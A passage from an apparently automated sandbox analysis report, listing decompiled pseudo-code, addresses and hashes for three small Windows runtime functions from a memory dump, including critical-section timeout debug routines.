                                                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction ID: f56e38c72298834fa6e0c062ffba51b6e9a46a630b6a200f46bd92d096daa8d4
                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction Fuzzy Hash: 3FC08C32080248BBCB126F41DC00F027B2AE7A0B60F000020B7040A5608536ED60E98C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CF7D50, Relevance: .0, Instructions: 7COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CF7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                            0x04cf7d56
                                                                                            0x04cf7d5b
                                                                                            0x04cf7d60
                                                                                            0x04cf7d5d
                                                                                            0x04cf7d5d
                                                                                            0x04cf7d5d

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction ID: 8f5167b32d95c4907aa7ef5773c7de1bbd29657ad6a8041680db80627dd178c0
                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction Fuzzy Hash: B7B092343029408FCF56DF18C580B1533E4BB44A40B8400D0E400CBA20D229E9008900
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D02ACB, Relevance: .0, Instructions: 5COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D02ACB() {
				void* _t5;

				return E04CEEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                            0x04d02adc

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction ID: 01600041bf44e2105417b2ec35addb66575fb860bf93139e241d67f4a4555f7c
                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction Fuzzy Hash: 1EB01232C10540CFCF02EF41C610B297332FB00790F054490900127930C328BC01DB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E04D6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x04d6fdda
                                                                                            0x04d6fde2
                                                                                            0x04d6fde5
                                                                                            0x04d6fdec
                                                                                            0x04d6fdfa
                                                                                            0x04d6fdff
                                                                                            0x04d6fe0a
                                                                                            0x04d6fe0f
                                                                                            0x04d6fe17
                                                                                            0x04d6fe1e
                                                                                            0x04d6fe19
                                                                                            0x04d6fe19
                                                                                            0x04d6fe19
                                                                                            0x04d6fe20
                                                                                            0x04d6fe21
                                                                                            0x04d6fe22
                                                                                            0x04d6fe25
                                                                                            0x04d6fe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D6FDFA
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D6FE01
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D6FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: a16b332a0fbf55dc833bdd9a39ba4ebbde1c0d9a155eea5214559718d0999b67
                                                                                            • Instruction ID: 41f152680e397a9e272ef4fcd2e13a896c9f84b99f06224c56d2b4e0b7fcf9d8
                                                                                            • Opcode Fuzzy Hash: a16b332a0fbf55dc833bdd9a39ba4ebbde1c0d9a155eea5214559718d0999b67
                                                                                            • Instruction Fuzzy Hash: CAF0F632740601BFE6205A45EC02F23BF5AEB44730F140318F628565E1EA62F87096F4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%